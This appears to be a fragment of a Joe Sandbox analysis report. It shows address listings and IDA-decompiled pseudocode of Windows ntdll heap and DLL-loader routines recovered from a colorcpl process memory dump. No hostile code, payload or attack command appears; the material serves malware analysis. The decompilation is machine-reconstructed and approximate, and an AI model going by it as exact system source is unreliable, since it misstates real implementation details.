                                                                                                0x06e822a2
                                                                                                0x06e822a8
                                                                                                0x06e822b3
                                                                                                0x06e822b5
                                                                                                0x06e822bb
                                                                                                0x06e822c1
                                                                                                0x06e822c5
                                                                                                0x06e822e6
                                                                                                0x06e822eb
                                                                                                0x06e822f0
                                                                                                0x06e822c7
                                                                                                0x06e822dc
                                                                                                0x06e822e1
                                                                                                0x06e822e1
                                                                                                0x06e822f3
                                                                                                0x06e822f8
                                                                                                0x06e822fd
                                                                                                0x06e82300
                                                                                                0x06e82307
                                                                                                0x06e8230e
                                                                                                0x06e8230e
                                                                                                0x06e82313
                                                                                                0x06e82313
                                                                                                0x06e822b5
                                                                                                0x06e822a2
                                                                                                0x06e3aafc
                                                                                                0x06e3a864
                                                                                                0x06e3a869
                                                                                                0x06e3aa5c
                                                                                                0x06e3aa5e
                                                                                                0x06e3a86f
                                                                                                0x06e3a87f
                                                                                                0x06e3a885
                                                                                                0x06e3a885
                                                                                                0x06e3a88b
                                                                                                0x06e3a890
                                                                                                0x06e3a896
                                                                                                0x06e3ab0c
                                                                                                0x06e3ab0f
                                                                                                0x06e3ab15
                                                                                                0x06e82320
                                                                                                0x06e82320
                                                                                                0x06e3ab1b
                                                                                                0x06e3a89c
                                                                                                0x06e3a89f
                                                                                                0x06e3a8a2
                                                                                                0x06e3a8a2
                                                                                                0x06e3a8a5
                                                                                                0x06e3a8af
                                                                                                0x06e3a8b3
                                                                                                0x06e3a8b8
                                                                                                0x06e3aa66
                                                                                                0x06e3a8be
                                                                                                0x06e3a8c5
                                                                                                0x06e3a8c6
                                                                                                0x06e3a8ce
                                                                                                0x06e82328
                                                                                                0x06e82332
                                                                                                0x06e82337
                                                                                                0x06e82337
                                                                                                0x06e3a8ce
                                                                                                0x06e3a8d4
                                                                                                0x06e3a8d8
                                                                                                0x06e3a8db
                                                                                                0x06e3a8de
                                                                                                0x06e3a8e1
                                                                                                0x06e3a8e5
                                                                                                0x06e3a8e8
                                                                                                0x06e3a8f0
                                                                                                0x06e3a8f3
                                                                                                0x06e8234c
                                                                                                0x06e82350
                                                                                                0x06e82355
                                                                                                0x06e82359
                                                                                                0x06e82359
                                                                                                0x06e3a8f9
                                                                                                0x06e3a901
                                                                                                0x06e3aae4
                                                                                                0x06e3aae4
                                                                                                0x06e3aaea
                                                                                                0x00000000
                                                                                                0x06e3a907
                                                                                                0x06e3a90a
                                                                                                0x06e3a91d
                                                                                                0x06e3a91d
                                                                                                0x00000000
                                                                                                0x06e3a910
                                                                                                0x06e3a910
                                                                                                0x06e3a910
                                                                                                0x06e3a914
                                                                                                0x06e3a924
                                                                                                0x06e3a924
                                                                                                0x06e3a924
                                                                                                0x06e3a924
                                                                                                0x06e3a916
                                                                                                0x06e3a91b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a91b
                                                                                                0x06e3a925
                                                                                                0x06e3a925
                                                                                                0x06e3a932
                                                                                                0x06e3a936
                                                                                                0x06e3a93c
                                                                                                0x06e3a93c
                                                                                                0x06e3a93c
                                                                                                0x06e3ab22
                                                                                                0x06e3ab24
                                                                                                0x06e3ab27
                                                                                                0x06e3ab27
                                                                                                0x06e3a942
                                                                                                0x06e3a944
                                                                                                0x06e3aaba
                                                                                                0x06e3aabd
                                                                                                0x06e3aac0
                                                                                                0x06e3aac0
                                                                                                0x06e3aac2
                                                                                                0x06e3ab2f
                                                                                                0x06e3aac4
                                                                                                0x06e3aac4
                                                                                                0x06e3aac7
                                                                                                0x06e3aaca
                                                                                                0x06e3aacc
                                                                                                0x06e3aace
                                                                                                0x06e3aace
                                                                                                0x06e3aace
                                                                                                0x06e3aad1
                                                                                                0x06e3aad1
                                                                                                0x06e3aad7
                                                                                                0x06e3aad9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82361
                                                                                                0x06e82369
                                                                                                0x06e8236b
                                                                                                0x00000000
                                                                                                0x06e82371
                                                                                                0x00000000
                                                                                                0x06e82371
                                                                                                0x00000000
                                                                                                0x06e8236b
                                                                                                0x06e3aac0
                                                                                                0x06e3a94a
                                                                                                0x06e3a94a
                                                                                                0x06e3a94d
                                                                                                0x06e3a94d
                                                                                                0x06e3a950
                                                                                                0x06e3a954
                                                                                                0x06e82376
                                                                                                0x06e82380
                                                                                                0x06e3a95a
                                                                                                0x06e3a95a
                                                                                                0x06e3a95c
                                                                                                0x06e3a95f
                                                                                                0x06e3a961
                                                                                                0x06e3a961
                                                                                                0x06e3a967
                                                                                                0x06e3a96a
                                                                                                0x06e3a972
                                                                                                0x06e3aa02
                                                                                                0x06e3aa06
                                                                                                0x06e3aa10
                                                                                                0x06e3aa16
                                                                                                0x06e3aa16
                                                                                                0x06e3aa1b
                                                                                                0x06e3aa21
                                                                                                0x06e3aa24
                                                                                                0x06e3aa27
                                                                                                0x06e3aa29
                                                                                                0x06e3aa2c
                                                                                                0x06e3aa32
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a978
                                                                                                0x06e3a978
                                                                                                0x06e3a97b
                                                                                                0x06e3a981
                                                                                                0x06e3a996
                                                                                                0x06e3a998
                                                                                                0x06e3a99f
                                                                                                0x06e3a9a2
                                                                                                0x06e8238a
                                                                                                0x06e3a9a8
                                                                                                0x06e3a9a8
                                                                                                0x06e3a9a8
                                                                                                0x06e3a9aa
                                                                                                0x06e3a9ad
                                                                                                0x06e3a9b0
                                                                                                0x06e3a9bb
                                                                                                0x06e3a9be
                                                                                                0x06e3a9c7
                                                                                                0x06e3a9c9
                                                                                                0x06e3a9c9
                                                                                                0x06e3a9cc
                                                                                                0x06e3a9d1
                                                                                                0x06e3aa6d
                                                                                                0x06e3aa70
                                                                                                0x06e3aa73
                                                                                                0x06e3aa75
                                                                                                0x06e3aa79
                                                                                                0x06e3aa7e
                                                                                                0x06e3aa82
                                                                                                0x06e3aa8f
                                                                                                0x06e3aa94
                                                                                                0x06e3aa96
                                                                                                0x06e82392
                                                                                                0x06e823a1
                                                                                                0x06e823a1
                                                                                                0x06e3aa9c
                                                                                                0x06e3aa9f
                                                                                                0x06e3aaa2
                                                                                                0x06e3aaa2
                                                                                                0x06e3aaa8
                                                                                                0x06e3aaab
                                                                                                0x06e3aaaf
                                                                                                0x00000000
                                                                                                0x06e3aab5
                                                                                                0x00000000
                                                                                                0x06e3aab5
                                                                                                0x06e3a9d7
                                                                                                0x06e3a9d7
                                                                                                0x06e3a9da
                                                                                                0x06e3a9e0
                                                                                                0x06e3a9e3
                                                                                                0x06e3a9e6
                                                                                                0x06e3a9e9
                                                                                                0x06e3a9eb
                                                                                                0x06e3a9fd
                                                                                                0x06e3a9fd
                                                                                                0x00000000
                                                                                                0x06e3a9eb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a983
                                                                                                0x06e3a983
                                                                                                0x06e3a983
                                                                                                0x06e3a987
                                                                                                0x06e3a995
                                                                                                0x06e3a995
                                                                                                0x06e3a995
                                                                                                0x06e3a995
                                                                                                0x06e3a989
                                                                                                0x06e3a98e
                                                                                                0x00000000
                                                                                                0x06e3a990
                                                                                                0x00000000
                                                                                                0x06e3a990
                                                                                                0x06e3a98e
                                                                                                0x00000000
                                                                                                0x06e3a983
                                                                                                0x06e3a972
                                                                                                0x06e3a90a
                                                                                                0x06e3aa34
                                                                                                0x06e3aa34
                                                                                                0x06e3aa40
                                                                                                0x06e3aa43
                                                                                                0x06e3aa46
                                                                                                0x06e3aa4d
                                                                                                0x06e823ab
                                                                                                0x06e823b2
                                                                                                0x06e823b8
                                                                                                0x06e823be
                                                                                                0x06e823c3
                                                                                                0x06e823c5
                                                                                                0x06e823cb
                                                                                                0x06e823d1
                                                                                                0x06e823d5
                                                                                                0x06e823f6
                                                                                                0x06e823fb
                                                                                                0x06e823d7
                                                                                                0x06e823ec
                                                                                                0x06e823f1
                                                                                                0x06e82403
                                                                                                0x06e82408
                                                                                                0x06e82410
                                                                                                0x06e82417
                                                                                                0x06e82422
                                                                                                0x06e82422
                                                                                                0x06e82417
                                                                                                0x06e823c5
                                                                                                0x06e823b2
                                                                                                0x00000000

                                                                                                Strings
                                                                                                • HEAP: , xrefs: 06E822E6, 06E823F6
                                                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 06E82403
                                                                                                • HEAP[%wZ]: , xrefs: 06E822D7, 06E823E7
                                                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 06E822F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                • API String ID: 0-1657114761
                                                                                                • Opcode ID: a29f1bffda7e50fc3d2936cba4975eca30b2e593b4a8a5ea07123575ebea702e
                                                                                                • Instruction ID: dc8c1fd1276cc14919519488e7c0df4d300cf0c2e7d0365dd9c532a781fc23d6
                                                                                                • Opcode Fuzzy Hash: a29f1bffda7e50fc3d2936cba4975eca30b2e593b4a8a5ea07123575ebea702e
                                                                                                • Instruction Fuzzy Hash: 8BD1DC70A003558FDB98CF68C498BAAB7F1FF48304F15A179D99A9B341E330E985CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E06E3A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E06E3DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E06E59730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E06EDA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E06E59660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E06E1B150();
					} else {
						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E06E1B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E06E37D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E06ED138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E06E37D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E06E37D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E06ED1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E06E37D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E06E37D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E06ED1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E06E6D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                                0x06e3a229
                                                                                                0x06e3a231
                                                                                                0x06e3a23f
                                                                                                0x06e3a242
                                                                                                0x06e3a244
                                                                                                0x06e3a24c
                                                                                                0x06e3a255
                                                                                                0x06e3a25a
                                                                                                0x06e3a25f
                                                                                                0x06e81c76
                                                                                                0x06e81c78
                                                                                                0x06e81c7e
                                                                                                0x06e81c7f
                                                                                                0x06e81c81
                                                                                                0x06e81c82
                                                                                                0x06e81c84
                                                                                                0x06e81c89
                                                                                                0x06e81c8b
                                                                                                0x06e81c9e
                                                                                                0x06e81c9e
                                                                                                0x06e81cab
                                                                                                0x06e81cb2
                                                                                                0x00000000
                                                                                                0x06e81cb2
                                                                                                0x06e81c8d
                                                                                                0x06e81c92
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81c94
                                                                                                0x06e81c98
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81c98
                                                                                                0x06e3a265
                                                                                                0x06e3a265
                                                                                                0x06e3a266
                                                                                                0x06e3a26f
                                                                                                0x06e3a270
                                                                                                0x06e3a276
                                                                                                0x06e3a277
                                                                                                0x06e3a279
                                                                                                0x06e3a27e
                                                                                                0x06e3a282
                                                                                                0x06e81db5
                                                                                                0x06e81dbb
                                                                                                0x06e81dc1
                                                                                                0x06e81dc5
                                                                                                0x06e81de4
                                                                                                0x06e81de9
                                                                                                0x06e81dc7
                                                                                                0x06e81ddc
                                                                                                0x06e81de1
                                                                                                0x06e81def
                                                                                                0x06e81df3
                                                                                                0x06e81df7
                                                                                                0x06e81dfe
                                                                                                0x06e81e06
                                                                                                0x06e3a302
                                                                                                0x06e3a308
                                                                                                0x06e3a308
                                                                                                0x06e3a288
                                                                                                0x06e3a28d
                                                                                                0x06e3a294
                                                                                                0x06e81cc1
                                                                                                0x06e3a29a
                                                                                                0x06e3a29a
                                                                                                0x06e3a29a
                                                                                                0x06e3a29f
                                                                                                0x06e81ccb
                                                                                                0x06e81cd1
                                                                                                0x06e81cd8
                                                                                                0x06e81cea
                                                                                                0x06e81cea
                                                                                                0x06e81cd8
                                                                                                0x06e3a2a9
                                                                                                0x06e3a2af
                                                                                                0x06e3a2bc
                                                                                                0x06e81cfd
                                                                                                0x06e3a2c2
                                                                                                0x06e3a2c2
                                                                                                0x06e3a2c2
                                                                                                0x06e3a2c7
                                                                                                0x06e81d07
                                                                                                0x06e81d0d
                                                                                                0x06e81d14
                                                                                                0x06e81d1f
                                                                                                0x06e81d21
                                                                                                0x06e81d2c
                                                                                                0x06e81d2c
                                                                                                0x06e81d2c
                                                                                                0x06e81d47
                                                                                                0x06e81d47
                                                                                                0x06e81d14
                                                                                                0x06e3a2cd
                                                                                                0x06e3a2d2
                                                                                                0x06e3a2d9
                                                                                                0x06e81d5a
                                                                                                0x06e3a2df
                                                                                                0x06e3a2df
                                                                                                0x06e3a2df
                                                                                                0x06e3a2e4
                                                                                                0x06e81d69
                                                                                                0x06e81d6b
                                                                                                0x06e81d76
                                                                                                0x06e81d76
                                                                                                0x06e81d76
                                                                                                0x06e81d91
                                                                                                0x06e81d91
                                                                                                0x06e3a2ea
                                                                                                0x06e3a2f0
                                                                                                0x06e3a2f5
                                                                                                0x06e81da8
                                                                                                0x06e81dad
                                                                                                0x06e81dad
                                                                                                0x06e3a2fd
                                                                                                0x06e3a300
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                • API String ID: 2994545307-2586055223
                                                                                                • Opcode ID: c91d00500e44324507cbfeeb69537354ec26aecd37781c52553189b2c48eade5
                                                                                                • Instruction ID: 87a9da56c311e6d0b622bee57d8fe8a854fa7a61e9784f6b3b9e17e1788bb447
                                                                                                • Opcode Fuzzy Hash: c91d00500e44324507cbfeeb69537354ec26aecd37781c52553189b2c48eade5
                                                                                                • Instruction Fuzzy Hash: ED5136722147819FE7A1EB68CD48FA777E8FF80754F091468F8A98B292D734D841CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E48E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 44%
                                                                                                			E06E48E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x6f0d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x6f08464; // 0x76690110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x6f05780 & 0x00000003) != 0) {
							E06E95510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x6f05780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E06E5B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x6f07984; // 0xe22ca0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x6f08464; // 0x76690110
					 *0x6f0b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E06E49B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x6f05780 & 0x00000005) != 0) {
						_push(_t49);
						E06E95510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                0x06e48e0f
                                                                                                0x06e48e16
                                                                                                0x06e48e19
                                                                                                0x06e48e1b
                                                                                                0x06e48e21
                                                                                                0x06e48e7f
                                                                                                0x06e48e85
                                                                                                0x06e89354
                                                                                                0x06e8936c
                                                                                                0x06e89371
                                                                                                0x06e8937b
                                                                                                0x06e89381
                                                                                                0x06e89381
                                                                                                0x06e8937b
                                                                                                0x06e48e9d
                                                                                                0x06e48e9d
                                                                                                0x06e48e29
                                                                                                0x06e48e2c
                                                                                                0x06e48e38
                                                                                                0x06e48e3e
                                                                                                0x06e48e43
                                                                                                0x06e48eb5
                                                                                                0x06e48eb9
                                                                                                0x06e892aa
                                                                                                0x06e892af
                                                                                                0x06e892e8
                                                                                                0x06e892e8
                                                                                                0x06e892af
                                                                                                0x06e48eb9
                                                                                                0x06e48e45
                                                                                                0x06e48e53
                                                                                                0x06e48e5b
                                                                                                0x06e48e5f
                                                                                                0x06e48e78
                                                                                                0x06e48e78
                                                                                                0x06e48e7d
                                                                                                0x06e48ec3
                                                                                                0x06e48ecd
                                                                                                0x06e48ed2
                                                                                                0x06e48ed2
                                                                                                0x06e48ec5
                                                                                                0x06e48ec5
                                                                                                0x00000000
                                                                                                0x06e48e7d
                                                                                                0x06e48e67
                                                                                                0x06e48ea4
                                                                                                0x06e8931a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e89320
                                                                                                0x06e48ea4
                                                                                                0x06e48e70
                                                                                                0x06e89325
                                                                                                0x06e89340
                                                                                                0x06e89345
                                                                                                0x06e89345
                                                                                                0x06e48e76
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Strings
                                                                                                • LdrpFindDllActivationContext, xrefs: 06E89331, 06E8935D
                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 06E8933B, 06E89367
                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 06E8932A
                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 06E89357
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                • API String ID: 0-3779518884
                                                                                                • Opcode ID: 915f803b983f19534088344854308759224060ac55efb8fcc20d387ee1efa698
                                                                                                • Instruction ID: 6d5c0fd6eb322b1eac74f27f2e6b1d6f90ca6c101e60a4825067e3a97bd68238
                                                                                                • Opcode Fuzzy Hash: 915f803b983f19534088344854308759224060ac55efb8fcc20d387ee1efa698
                                                                                                • Instruction Fuzzy Hash: FD412931E10315AFEBF5BB38ACC9A77B3A5BB4464CF066169DA0857151E770EC84C2C2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                • API String ID: 2994545307-336120773
                                                                                                • Opcode ID: ec1803a8d58a8cb7a8c913880185379dc874a7778b26f4f3fabac81695b5be57
                                                                                                • Instruction ID: 48cfd4f6d23024d0c3ead8193786cb6f9082f9300725644c0de389f6a63628e7
                                                                                                • Opcode Fuzzy Hash: ec1803a8d58a8cb7a8c913880185379dc874a7778b26f4f3fabac81695b5be57
                                                                                                • Instruction Fuzzy Hash: F8312331610354EFD3D0DB58CC84F6BB3E8EF14624F195175F515DB280E670E885CAA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E399BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E06E399BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
